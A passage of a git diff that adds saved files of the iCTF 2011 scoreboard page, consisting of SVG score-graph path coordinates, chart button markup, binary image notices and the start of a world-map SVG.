L 294.23805147058823 225.24279445333252 L 295.76608455882354 225.24279445333252 L 297.29411764705884 225.24279445333252 L 298.82215073529414 225.24279445333252 L 300.35018382352945 225.24279445333252 L 301.8782169117647 225.24279445333252 L 303.40625 225.24279445333252 L 304.9342830882353 225.24279445333252 L 306.4623161764706 224.58247765333255 L 307.9903492647059 223.98665333333253 L 309.51838235294116 223.98665333333253 L 311.04641544117646 223.98665333333253 L 312.57444852941177 223.98665333333253 L 314.1024816176471 223.44000053333255 L 315.6305147058824 221.36137013333254 L 317.1585477941177 217.84489013333254 L 318.6865808823529 215.77719989333252 L 320.21461397058823 215.77719989333252 L 321.74264705882354 211.94388149333253 L 323.27068014705884 211.94388149333253 L 324.79871323529414 211.94388149333253 L 326.32674632352945 211.94388149333253 L 327.8547794117647 210.98739893333254 L 329.3828125 210.98739893333254 L 330.9108455882353 210.98739893333254 L 332.4388786764706 209.79051701333253 L 333.9669117647059 208.71225610666627 L 335.4949448529412 206.47733770666628 L 337.02297794117646 204.56067850666628 L 338.55101102941177 203.49792010666627 L 340.0790441176471 203.49792010666627 L 341.6070772058824 203.49792010666627 L 343.1351102941177 203.49792010666627 L 344.6631433823529 203.49792010666627 L 346.19117647058823 201.6082561066663 L 347.71920955882354 200.60943370666627 L 349.24724264705884 199.62410890666627 L 350.77527573529414 196.54665610666626 L 352.30330882352945 192.5378689066663 L 353.8313419117647 192.5378689066663 L 355.359375 192.5378689066663 L 356.8874080882353 191.85723466666627 L 358.4154411764706 186.67415626666627 L 359.9434742647059 182.24126026666627 L 361.4715073529412 178.77308746666625 L 362.99954044117646 176.15135626666626 L 364.52757352941177 176.15135626666626 L 366.0556066176471 176.15135626666626 L 367.5836397058824 175.48817418666627 L 369.1116727941177 174.0304333866663 L 370.6397058823529 174.0304333866663 L 372.16773897058823 174.0304333866663 L 373.69577205882354 173.3420557866663 L 375.22380514705884 171.92480778666626 L 376.75183823529414 170.85174858666628 L 378.27987132352945 169.07006538666627 L 379.8079044117647 167.19880074666628 L 381.3359375 163.68942474666628 L 382.8639705882353 162.98754954666626 L 384.3920036764706 160.86530058666628 L 385.9200367647059 160.40975658666628 L 387.4480698529412 160.40975658666628 L 388.97610294117646 160.40975658666628 L 390.50413602941177 160.40975658666628 L 392.0321691176471 160.40975658666628 L 393.5602022058824 159.0116893866663 L 395.0882352941177 157.27035690666628 L 405.0882352941177 157.27035690666628" fill="none" isTracker="true" stroke-opacity="0.000001" stroke="rgb(192,192,192)" stroke-width="22" visibility="visible" zIndex="1" style=""></path><path d="M -6.088235294117647 236.8 L 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.79392608 L 68.08915441176471 236.79392608 L 69.6171875 236.79392608 L 71.1452205882353 236.79392608 L 72.6732536764706 236.79392608 L 74.20128676470588 236.79392608 L 75.72931985294119 236.79392608 L 77.25735294117648 236.79392608 L 78.78538602941177 236.79392608 L 80.31341911764706 236.79392608 L 81.84145220588236 236.79392608 L 83.36948529411765 236.79392608 L 84.89751838235294 236.79392608 L 86.42555147058825 236.79392608 L 87.95358455882354 236.79392608 L 89.48161764705883 236.79392608 L 91.00965073529413 236.79392608 L 92.53768382352942 236.79392608 L 94.06571691176471 236.79392608 L 95.59375 236.79392608 L 97.1217830882353 236.79392608 L 98.6498161764706 236.79392608 L 100.17784926470588 236.79392608 L 101.70588235294119 236.79392608 L 103.23391544117648 236.79392608 L 104.76194852941177 236.79392608 L 106.28998161764706 236.79392608 L 107.81801470588236 236.79392608 L 109.34604779411765 236.79392608 L 110.87408088235294 236.79392608 L 112.40211397058825 236.79392608 L 113.93014705882354 236.79392608 L 115.45818014705883 236.79392608 L 116.98621323529413 236.79392608 L 118.51424632352942 236.79392608 L 120.04227941176471 236.79392608 L 121.5703125 236.79392608 L 123.0983455882353 236.79392608 L 124.6263786764706 236.79392608 L 126.15441176470588 236.57121568 L 127.68244485294119 236.57121568 L 129.21047794117646 236.57121568 L 130.73851102941177 236.43884448 L 132.26654411764707 236.3858368 L 133.79457720588235 236.3858368 L 135.32261029411765 236.3858368 L 136.85064338235296 236.3858368 L 138.37867647058823 236.28332608 L 139.90670955882354 235.34144224 L 141.43474264705884 234.90177568000001 L 142.96277573529412 234.90177568000001 L 144.49080882352942 234.90177568000001 L 146.01884191176472 234.90177568000001 L 147.546875 234.90177568000001 L 149.0749080882353 234.87327048533336 L 150.6029411764706 234.84748296533337 L 152.13097426470588 234.83289608533337 L 153.6590073529412 234.83289608533337 L 155.18704044117646 234.83289608533337 L 156.71507352941177 234.83289608533337 L 158.24310661764707 234.45226376533338 L 159.77113970588235 233.87524136533335 L 161.29917279411765 233.29889384533337 L 162.82720588235296 233.23478024533335 L 164.35523897058823 233.23478024533335 L 165.88327205882354 233.23478024533335 L 167.41130514705884 233.23478024533335 L 168.93933823529412 233.23478024533335 L 170.46737132352942 233.23478024533335 L 171.99540441176472 233.17052851200012 L 173.5234375 233.17052851200012 L 175.0514705882353 233.11686963200012 L 176.5795036764706 232.59602408533337 L 178.10753676470588 232.048308448 L 179.6355698529412 231.94601084800001 L 181.1636029411765 231.92968743466662 L 182.69163602941177 231.44984775466662 L 184.21966911764707 231.03952071466662 L 185.74770220588235 231.03952071466662 L 187.27573529411765 231.03952071466662 L 188.80376838235296 231.00927898666663 L 190.33180147058823 231.00927898666663 L 191.85983455882354 231.00927898666663 L 193.38786764705884 231.00927898666663 L 194.91590073529412 230.90534746666663 L 196.44393382352942 230.69815930666664 L 197.97196691176472 230.61042490666665 L 199.5 230.61042490666665 L 201.0280330882353 230.61042490666665 L 202.5560661764706 230.61042490666665 L 204.08409926470588 230.4201087466666 L 205.6121323529412 230.37084250666663 L 207.1401654411765 230.37084250666663 L 208.66819852941177 230.37084250666663 L 210.19623161764707 230.31809530666663 L 211.72426470588235 230.31809530666663 L 213.25229779411765 230.31809530666663 L 214.78033088235296 230.31809530666663 L 216.30836397058823 230.31809530666663 L 217.83639705882354 230.31809530666663 L 219.36443014705884 230.31809530666663 L 220.89246323529412 230.20066618666664 L 222.42049632352942 230.20066618666664 L 223.94852941176472 230.14532602666662 L 225.4765625 230.14532602666662 L 227.0045955882353 229.9705321066666 L 228.5326286764706 229.93614874666662 L 230.06066176470588 229.90590701866662 L 231.5886948529412 229.75047228799986 L 233.1167279411765 229.75047228799986 L 234.64476102941177 228.46820028799988 L 236.17279411764707 227.17917948799987 L 237.70082720588238 226.35042684799987 L 239.22886029411765 226.21914492799988 L 240.75689338235296 226.21914492799988 L 242.28492647058823 226.21914492799988 L 243.81295955882354 225.24461820799988 L 245.34099264705884 223.39544700799988 L 246.86902573529412 221.9943961279999 L 248.39705882352942 220.71212412799986 L 249.92509191176472 220.51051260799989 L 251.453125 220.38884239999987 L 252.9811580882353 219.13221583999987 L 254.5091911764706 218.02541263999987 L 256.0372242647059 217.83708559999985 L 257.56525735294116 217.72174505599986 L 259.09329044117646 217.66970115199987 L 260.62132352941177 217.62316205866648 L 262.1493566176471 217.5825271786665 L 263.6773897058824 217.44329667199986 L 265.2054227941177 216.9640213653331 L 266.7334558823529 216.00906616533314 L 268.26148897058823 214.76561752533314 L 269.78952205882354 213.1439519253331 L 271.31755514705884 209.03393272533313 L 272.84558823529414 207.46885048533312 L 274.37362132352945 203.62025848533312 L 275.9016544117647 201.9684048319994 L 277.4296875 197.99803843201124 L 278.9577205882353 197.99803843201124 L 280.4857536764706 197.99803843201124 L 282.0137867647059 197.99803843201124 L 283.54181985294116 197.99803843201124 L 285.06985294117646 197.99803843201124 L 286.59788602941177 197.89275715201123 L 288.1259191176471 197.34070531201124 L 289.6539522058824 197.26114051201125 L 291.1819852941177 196.26366787201124 L 292.7100183823529 195.36607747201123 L 294.23805147058823 194.29031875201122 L 295.76608455882354 194.17700995201125 L 297.29411764705884 194.02017494401122 L 298.82215073529414 193.00785494401123 L 300.35018382352945 191.79577046401124 L 301.8782169117647 190.39202006401123 L 303.40625 188.78310614401124 L 304.9342830882353 188.53212932267786 L 306.4623161764706 188.33379985067785 L 307.9903492647059 188.14489975467785 L 309.51838235294116 188.0599659093445 L 311.04641544117646 187.91201326934447 L 312.57444852941177 186.6015443093445 L 314.1024816176471 186.5115614933445 L 315.6305147058824 186.1637496533445 L 317.1585477941177 185.1481618133445 L 318.6865808823529 183.3273781973445 L 320.21461397058823 182.4770293973445 L 321.74264705882354 181.96479547734447 L 323.27068014705884 181.89024610134447 L 324.79871323529414 181.67988561067773 L 326.32674632352945 181.50274026667773 L 327.8547794117647 181.31774026667773 L 329.3828125 181.18816330667772 L 330.9108455882353 181.07478346667773 L 332.4388786764706 181.01226826667772 L 333.9669117647059 180.95459799467773 L 335.4949448529412 180.8502978560111 L 337.02297794117646 180.64255874134437 L 338.55101102941177 180.39420290134439 L 340.0790441176471 179.97801506134437 L 341.6070772058824 179.71616162134438 L 343.1351102941177 178.56076706134436 L 344.6631433823529 177.49280853334437 L 346.19117647058823 175.12447701334435 L 347.71920955882354 174.88842530134434 L 349.24724264705884 173.47440962134436 L 350.77527573529414 170.80998338134435 L 352.30330882352945 167.90284898134436 L 353.8313419117647 167.64909410134436 L 355.359375 167.64909410134436 L 356.8874080882353 167.64909410134436 L 358.4154411764706 167.64909410134436 L 359.9434742647059 167.64909410134436 L 361.4715073529412 167.5902256213444 L 362.99954044117646 166.93679970134434 L 364.52757352941177 166.84501602134435 L 366.0556066176471 166.75593186134435 L 367.5836397058824 166.67494626134436 L 369.1116727941177 166.62493410134434 L 370.6397058823529 166.59891214934436 L 372.16773897058823 166.50716398934438 L 373.69577205882354 166.44246075734438 L 375.22380514705884 166.33987899734436 L 376.75183823529414 165.61100859734435 L 378.27987132352945 165.33768219734438 L 379.8079044117647 164.66955099734437 L 381.3359375 164.00141979734437 L 382.8639705882353 163.32384027734437 L 384.3920036764706 163.01879451734436 L 385.9200367647059 162.72319707734437 L 387.4480698529412 161.62266118401112 L 388.97610294117646 160.5876083840111 L 390.50413602941177 160.5035645120111 L 392.0321691176471 160.5035645120111 L 393.5602022058824 160.5035645120111 L 395.0882352941177 160.5035645120111 L 405.0882352941177 160.5035645120111" fill="none" isTracker="true" stroke-opacity="0.000001" stroke="rgb(192,192,192)" stroke-width="22" visibility="visible" zIndex="1" style=""></path><path d="M -6.088235294117647 236.8 L 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.8 L 68.08915441176471 236.8 L 69.6171875 236.8 L 71.1452205882353 236.8 L 72.6732536764706 236.8 L 74.20128676470588 236.8 L 75.72931985294119 236.8 L 77.25735294117648 236.8 L 78.78538602941177 236.8 L 80.31341911764706 236.8 L 81.84145220588236 236.8 L 83.36948529411765 236.8 L 84.89751838235294 236.8 L 86.42555147058825 236.8 L 87.95358455882354 236.8 L 89.48161764705883 236.8 L 91.00965073529413 236.8 L 92.53768382352942 236.8 L 94.06571691176471 236.8 L 95.59375 236.8 L 97.1217830882353 236.8 L 98.6498161764706 236.8 L 100.17784926470588 236.8 L 101.70588235294119 236.8 L 103.23391544117648 236.8 L 104.76194852941177 236.8 L 106.28998161764706 236.8 L 107.81801470588236 236.8 L 109.34604779411765 236.8 L 110.87408088235294 236.8 L 112.40211397058825 236.8 L 113.93014705882354 236.8 L 115.45818014705883 236.8 L 116.98621323529413 236.8 L 118.51424632352942 236.4867136 L 120.04227941176471 236.4867136 L 121.5703125 236.4867136 L 123.0983455882353 236.08516 L 124.6263786764706 236.08516 L 126.15441176470588 236.08516 L 127.68244485294119 235.96556415999999 L 129.21047794117646 235.77993664 L 130.73851102941177 235.77993664 L 132.26654411764707 235.77993664 L 133.79457720588235 235.77993664 L 135.32261029411765 235.77993664 L 136.85064338235296 235.77993664 L 138.37867647058823 235.77993664 L 139.90670955882354 235.77993664 L 141.43474264705884 235.77993664 L 142.96277573529412 235.77993664 L 144.49080882352942 235.77993664 L 146.01884191176472 235.77993664 L 147.546875 235.77993664 L 149.0749080882353 235.77993664 L 150.6029411764706 235.77993664 L 152.13097426470588 235.77993664 L 153.6590073529412 235.77993664 L 155.18704044117646 235.77993664 L 156.71507352941177 235.77993664 L 158.24310661764707 235.77993664 L 159.77113970588235 235.77993664 L 161.29917279411765 235.77993664 L 162.82720588235296 235.77993664 L 164.35523897058823 235.77993664 L 165.88327205882354 235.45261984 L 167.41130514705884 235.15567264 L 168.93933823529412 234.31029664 L 170.46737132352942 234.31029664 L 171.99540441176472 234.31029664 L 173.5234375 233.85315423999998 L 175.0514705882353 233.85315423999998 L 176.5795036764706 233.85315423999998 L 178.10753676470588 233.64056704 L 179.6355698529412 233.64056704 L 181.1636029411765 233.16342688 L 182.69163602941177 233.16342688 L 184.21966911764707 233.16342688 L 185.74770220588235 233.16342688 L 187.27573529411765 233.16342688 L 188.80376838235296 233.16342688 L 190.33180147058823 233.16342688 L 191.85983455882354 233.16342688 L 193.38786764705884 233.16342688 L 194.91590073529412 233.16342688 L 196.44393382352942 233.16342688 L 197.97196691176472 233.16342688 L 199.5 233.16342688 L 201.0280330882353 233.16342688 L 202.5560661764706 233.16342688 L 204.08409926470588 233.16342688 L 205.6121323529412 233.16342688 L 207.1401654411765 233.16342688 L 208.66819852941177 233.16342688 L 210.19623161764707 233.16342688 L 211.72426470588235 233.16342688 L 213.25229779411765 232.99335711999998 L 214.78033088235296 232.99335711999998 L 216.30836397058823 232.99335711999998 L 217.83639705882354 232.99335711999998 L 219.36443014705884 232.99335711999998 L 220.89246323529412 232.99335711999998 L 222.42049632352942 232.99335711999998 L 223.94852941176472 232.99335711999998 L 225.4765625 232.99335711999998 L 227.0045955882353 232.99335711999998 L 228.5326286764706 232.99335711999998 L 230.06066176470588 232.99335711999998 L 231.5886948529412 232.99335711999998 L 233.1167279411765 232.99335711999998 L 234.64476102941177 232.99335711999998 L 236.17279411764707 232.99335711999998 L 237.70082720588238 232.99335711999998 L 239.22886029411765 232.99335711999998 L 240.75689338235296 232.99335711999998 L 242.28492647058823 231.88331765333254 L 243.81295955882354 231.88331765333254 L 245.34099264705884 231.88331765333254 L 246.86902573529412 231.35016245333253 L 248.39705882352942 230.57796949333255 L 249.92509191176472 230.57796949333255 L 251.453125 230.57796949333255 L 252.9811580882353 230.57796949333255 L 254.5091911764706 230.57796949333255 L 256.0372242647059 230.57796949333255 L 257.56525735294116 229.79066869333252 L 259.09329044117646 229.79066869333252 L 260.62132352941177 229.79066869333252 L 262.1493566176471 226.4715993813349 L 263.6773897058824 226.18284546133492 L 265.2054227941177 226.18284546133492 L 266.7334558823529 226.18284546133492 L 268.26148897058823 226.18284546133492 L 269.78952205882354 226.18284546133492 L 271.31755514705884 226.18284546133492 L 272.84558823529414 226.18284546133492 L 274.37362132352945 226.18284546133492 L 275.9016544117647 226.18284546133492 L 277.4296875 226.18284546133492 L 278.9577205882353 226.18284546133492 L 280.4857536764706 226.18284546133492 L 282.0137867647059 226.18284546133492 L 283.54181985294116 226.18284546133492 L 285.06985294117646 226.18284546133492 L 286.59788602941177 226.18284546133492 L 288.1259191176471 226.18284546133492 L 289.6539522058824 226.18284546133492 L 291.1819852941177 226.18284546133492 L 292.7100183823529 226.18284546133492 L 294.23805147058823 226.18284546133492 L 295.76608455882354 226.18284546133492 L 297.29411764705884 226.18284546133492 L 298.82215073529414 226.18284546133492 L 300.35018382352945 225.3436854613349 L 301.8782169117647 224.7328930133349 L 303.40625 223.63356558933492 L 304.9342830882353 222.70822420266865 L 306.4623161764706 222.46780116266865 L 307.9903492647059 217.62137185066865 L 309.51838235294116 214.23019378133608 L 311.04641544117646 213.85766002133607 L 312.57444852941177 213.85766002133607 L 314.1024816176471 213.85766002133607 L 315.6305147058824 213.4392344213361 L 317.1585477941177 211.70801922133597 L 318.6865808823529 210.78822171733597 L 320.21461397058823 206.15989467733596 L 321.74264705882354 206.15989467733596 L 323.27068014705884 206.15989467733596 L 324.79871323529414 204.18924507733595 L 326.32674632352945 200.70281499733596 L 327.8547794117647 198.08428059733598 L 329.3828125 194.27795739733597 L 330.9108455882353 192.84856155733598 L 332.4388786764706 191.55279195733598 L 333.9669117647059 190.62483195733597 L 335.4949448529412 189.96075003733597 L 337.02297794117646 189.43029435733598 L 338.55101102941177 189.43029435733598 L 340.0790441176471 189.04156347733598 L 341.6070772058824 188.656881877336 L 343.1351102941177 187.14312603733597 L 344.6631433823529 186.93188859733596 L 346.19117647058823 185.84263227733598 L 347.71920955882354 184.64202075733596 L 349.24724264705884 184.10307579733598 L 350.77527573529414 184.056509077336 L 352.30330882352945 184.056509077336 L 353.8313419117647 184.056509077336 L 355.359375 184.056509077336 L 356.8874080882353 184.056509077336 L 358.4154411764706 184.056509077336 L 359.9434742647059 184.056509077336 L 361.4715073529412 184.056509077336 L 362.99954044117646 184.056509077336 L 364.52757352941177 184.056509077336 L 366.0556066176471 183.89566267733596 L 367.5836397058824 182.08698427733597 L 369.1116727941177 179.46305083733597 L 370.6397058823529 178.09439419733596 L 372.16773897058823 176.30056315733597 L 373.69577205882354 175.09522747733598 L 375.22380514705884 174.26647483733598 L 376.75183823529414 173.595928277336 L 378.27987132352945 173.595928277336 L 379.8079044117647 173.38577064533598 L 381.3359375 173.38577064533598 L 382.8639705882353 173.36823915733595 L 384.3920036764706 172.84311147733598 L 385.9200367647059 172.20678843733594 L 387.4480698529412 170.69409859200272 L 388.97610294117646 168.3879981120027 L 390.50413602941177 166.4769013440027 L 392.0321691176471 166.03602631466944 L 393.5602022058824 165.88442695466946 L 395.0882352941177 165.42724785066943 L 405.0882352941177 165.42724785066943" fill="none" isTracker="true" stroke-opacity="0.000001" stroke="rgb(192,192,192)" stroke-width="22" visibility="visible" zIndex="1" style=""></path></g><rect rx="3" ry="3" fill="url(http://scoreboard.ictf2011.info/score-graph.html#highcharts-1578)" x="0.5" y="0.5" width="23" height="19" stroke-width="1" transform="translate(654,10)" zIndex="19" stroke="#000000"></rect><rect rx="3" ry="3" fill="url(http://scoreboard.ictf2011.info/score-graph.html#highcharts-1579)" x="0.5" y="0.5" width="23" height="19" stroke-width="1" transform="translate(628,10)" zIndex="19" stroke="#000000"></rect><path d="M 6 17 L 18 17 18 14 6 14 Z M 12 14 L 9 9 11 9 11 5 13 5 13 9 15 9 Z" fill="#55BE3B" transform="translate(654,10)" stroke="#C0C0C0" stroke-width="1" zIndex="20"></path><path d="M 6 14 L 18 14 18 9 6 9 Z M 9 9 L 9 5 15 5 15 9 Z M 9 14 L 7.5 17 16.5 17 15 14 Z" fill="#7797BE" transform="translate(628,10)" stroke="#C0C0C0" stroke-width="1" zIndex="20"></path><rect rx="0" ry="0" fill="rgb(255,255,255)" x="654" y="10" width="24" height="20" stroke-width="0.000001" id="exportButton" fill-opacity="0.001" title="Export to raster or vector image" zIndex="21" style="cursor:pointer;"><title>Export to raster or vector image</title></rect><rect rx="0" ry="0" fill="rgb(255,255,255)" x="628" y="10" width="24" height="20" stroke-width="0.000001" id="printButton" fill-opacity="0.001" title="Print the chart" zIndex="21" style="cursor:pointer;"><title>Print the chart</title></rect></svg></div></div> + + +</body></html> +\ No newline at end of file diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/sg.png b/ictf2011/scoreboard.ictf2011_end.info_files/sg.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/us.png b/ictf2011/scoreboard.ictf2011_end.info_files/us.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/world.svg b/ictf2011/scoreboard.ictf2011_end.info_files/world.svg @@ -0,0 +1,19 @@ +<svg xmlns:dc="http://purl.org/dc/elements/1.1/" + xmlns:cc="http://web.resource.org/cc/" + xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" + xmlns:svg="http://www.w3.org/2000/svg" + xmlns="http://www.w3.org/2000/svg" + id="svg2" + width="1260" + height="630" + version="1.0" +> + <path + style="fill:#4265AC" + d="M -3.0314879e-016,609.68431 L -6.0629759e-016,589.36862 L 11.75,588.04884 C 18.2125,587.32297 24.625,586.67753 26,586.61453 C 27.375,586.55154 28.886087,585.89064 29.357971,585.14586 C 30.008374,584.11932 32.790563,583.84998 40.857971,584.03255 C 54.332772,584.33748 54.983923,584.28211 53,583 C 51.87625,582.27378 52.377916,582.03348 55,582.042 C 61.670544,582.06367 90.514119,578.86505 93.5,577.77252 C 95.15,577.16879 98.75,576.55931 101.5,576.41812 C 125.10454,575.20624 142.07015,573.31075 144.88532,571.57088 C 145.56247,571.15237 149.80279,571.28724 154.30825,571.87058 C 158.81371,572.45392 170.5568,573.17409 180.40399,573.47095 C 191.32866,573.80031 198.83268,574.44618 199.65399,575.1278 C 200.71115,576.00516 201,575.78268 201,574.09106 C 201,571.16422 203.20599,570.53804 206.86008,572.42765 C 208.53241,573.29244 211.40803,574 213.25034,574 C 215.09265,574 217.0275,574.39871 217.55,574.88603 C 218.0725,575.37334 221.2,576.09163 224.5,576.48222 L 230.5,577.19239 L 228.09699,575.09619 C 226.77533,573.94329 226.10033,572.95514 226.59699,572.90032 C 227.09365,572.8455 226.375,572.46816 225,572.06179 C 223.625,571.65543 222.6125,570.80029 222.75,570.16147 C 222.8875,569.52266 222.46,569 221.8,569 C 220.86929,569 220.87035,568.72965 221.80473,567.79527 C 223.65712,565.94288 247.52573,565.3615 249.64126,567.11724 C 250.88024,568.1455 254.52874,568.41012 264.63927,568.20502 C 271.98767,568.05596 278,568.32685 278,568.80699 C 278,569.78496 307.54772,569.52614 313,568.50042 C 315.01239,568.12183 319.25512,568.479 322.98217,569.34075 C 326.83539,570.23167 330.07991,570.49378 330.98217,569.98701 C 332.81894,568.95536 331.7478,568.48579 325.58631,567.62156 C 323.43378,567.31964 321.25459,566.65459 320.74367,566.14367 C 319.57534,564.97534 321.71138,560.70359 323.05017,561.53101 C 323.57258,561.85387 324,561.64148 324,561.05902 C 324,560.47656 322.875,560 321.5,560 C 320.125,560 319,559.55 319,559 C 319,558.16451 324.16411,557.63472 332.20028,557.64578 C 333.13543,557.64706 333.68543,557.30003 333.42249,556.87459 C 333.15955,556.44914 334.56291,555.79742 336.54106,555.42632 C 339.52411,554.8667 340.39153,555.11398 341.62556,556.87579 C 343.22039,559.15273 345.16162,559.75088 344.75,557.83853 C 344.6125,557.19971 345.625,556.39193 347,556.04344 C 350.39462,555.18309 350.27261,552.5 346.83886,552.5 C 343.36886,552.5 342.39379,551.43537 344.04337,549.44774 C 344.99229,548.30436 346.29613,548.02057 348.60789,548.45426 C 351.70224,549.03477 353.44416,548.00931 353.48469,545.58333 C 353.49311,545.07917 354.0625,544.47917 354.75,544.25 C 355.4375,544.02083 356,544.31119 356,544.89523 C 356,545.61953 356.80707,545.58939 358.53864,544.80044 C 359.93489,544.16427 360.86164,543.08182 360.59808,542.39499 C 359.96205,540.73753 362.59351,538.63004 364.42266,539.33195 C 365.21913,539.63758 366.03279,539.40162 366.23081,538.80758 C 366.47179,538.08462 367.32981,538.18585 368.82593,539.11376 C 370.26605,540.00694 371.31693,540.14432 371.78051,539.5 C 372.59262,538.37127 372.65828,538.35253 383.1626,536.25155 C 387.37704,535.40862 391.65204,535.05958 392.6626,535.4759 C 394.69373,536.31266 394.23519,536.54613 388.76422,537.46075 C 386.67661,537.80975 385.13246,538.60749 385.26422,539.26891 C 385.3939,539.91989 384.42416,540.6153 383.10924,540.81426 C 381.15472,541.10999 380.84465,540.84721 381.40993,539.37413 C 381.91126,538.06769 381.45036,538.24971 379.73363,540.03613 C 378.43137,541.39126 377.5229,542.81773 377.71481,543.20607 C 377.90672,543.59441 376.90129,544.6738 375.48052,545.60472 C 373.67427,546.78822 373.21352,547.61352 373.94865,548.34865 C 374.52689,548.92689 375,550.21 375,551.2 C 375,552.45333 375.75926,553 377.5,553 C 380.22207,553 380.28844,553.08477 379.39301,555.41821 C 379.05917,556.2882 377.95,557 376.92819,557 C 374.24121,557 372.63654,560.45236 374.0746,563.13939 C 374.70433,564.31605 375.58899,566.5669 376.04052,568.14127 C 376.71216,570.48314 376.4962,571.19926 374.85318,572.07858 C 373.74861,572.66972 373.07984,573.76568 373.36701,574.51404 C 373.65674,575.26906 373.13488,576.05625 372.19457,576.28259 C 370.78704,576.62139 370.75408,576.7765 372,577.19827 C 377.4324,579.03726 393.2906,582.36278 402.0833,583.50683 C 407.81249,584.25228 416.02812,585.61876 420.34026,586.54344 C 426.74178,587.91617 429.21912,588.02236 433.84026,587.12212 C 437.69121,586.37191 442.80004,586.30957 449.82588,586.92704 C 458.12508,587.65643 460.82875,587.55167 463.60106,586.39333 C 465.49819,585.60066 469.17654,584.75833 471.77519,584.52149 C 474.37384,584.28465 477.85,583.62975 479.5,583.06616 C 481.15,582.50257 484.6375,581.77955 487.25,581.45945 C 489.8625,581.13935 492,580.47542 492,579.98404 C 492,579.49266 493.6875,578.78824 495.75,578.41865 C 497.8125,578.04907 500.24729,577.09532 501.16066,576.29921 C 502.07402,575.5031 505.25292,574.52176 508.22488,574.11846 C 511.71442,573.64492 514.88379,572.42768 517.17245,570.68204 C 519.62468,568.81163 521.76131,568.03605 524.10822,568.16442 C 528.2281,568.38976 539.32898,566.22981 543.65113,564.36186 C 545.38425,563.61284 547.72019,563 548.84211,563 C 549.96403,563 551.11275,562.62658 551.39482,562.17018 C 551.67689,561.71379 556.54095,561.26422 562.20384,561.17114 C 573.06302,560.99266 582.66987,559.06214 582.25,557.14282 C 581.85284,555.32728 586.14658,555.81829 587.55971,557.75 C 588.708,559.31969 590.98617,559.5 609.66995,559.5 C 624.27236,559.5 631.24743,559.12812 633,558.25616 C 635.97157,556.7777 641,556.59696 641,557.96862 C 641,558.50135 641.65791,558.68477 642.46202,558.3762 C 643.26613,558.06763 648.57408,558.31582 654.25747,558.92774 C 669.53823,560.57296 675.37589,560.40372 686.96506,557.97948 C 694.19588,556.46692 697.54394,556.13182 697.7984,556.89519 C 698.33239,558.49716 702,558.25401 702,556.61663 C 702,555.11235 706.09253,553.61816 706.96422,554.80418 C 707.62307,555.7006 716.29314,558 719.01435,558 C 720.10646,558 721,558.53419 721,559.18709 C 721,559.83999 722.2375,559.21346 723.75,557.79479 C 725.78168,555.88915 728.72025,554.78238 735,553.55764 C 739.675,552.64587 745.00065,551.42948 746.83478,550.85456 C 748.66891,550.27963 751.81891,550.09385 753.83478,550.44171 C 756.12918,550.83765 757.00113,550.73836 756.16615,550.17626 C 755.0869,549.44971 755.13461,549.16232 756.41615,548.67055 C 757.28727,548.33627 758.69662,548.33009 759.54804,548.65681 C 760.44615,549.00145 761.67128,548.46346 762.46609,547.37543 C 763.63533,545.77483 765.13038,545.5114 772.66805,545.57782 C 781.42908,545.65502 787.01882,546.56892 788.0213,548.088 C 788.30801,548.52247 789.88301,549.13421 791.5213,549.44743 C 796.36985,550.37439 827.9665,551.95008 829.54669,551.34371 C 830.44176,551.00024 831,551.39598 831,552.37396 C 831,553.29655 832.15225,554.20912 833.75,554.55193 C 835.2625,554.87645 838.525,555.75312 841,556.50009 C 845.8731,557.97082 857.60053,557.20628 858.83365,555.33747 C 859.72098,553.99271 865.65044,552.00792 868.89922,551.9682 C 870.32965,551.9507 872.37351,551.2757 873.44113,550.4682 C 875.36264,549.01484 875.36264,548.98552 873.44113,547.56732 C 871.9889,546.49548 871.78589,545.84439 872.6351,544.98222 C 873.49083,544.11343 874.57727,544.24716 877.04947,545.52558 C 879.93821,547.01941 881.21156,547.07895 887.74156,546.02555 C 894.14273,544.99293 895.38586,545.03922 896.85057,546.36477 C 898.19932,547.58537 900.38553,547.80606 907.52338,547.44216 C 918.58598,546.87816 921,546.3583 921,544.53996 C 921,542.04855 923.0277,541.73886 927.68775,543.51855 C 931.41736,544.9429 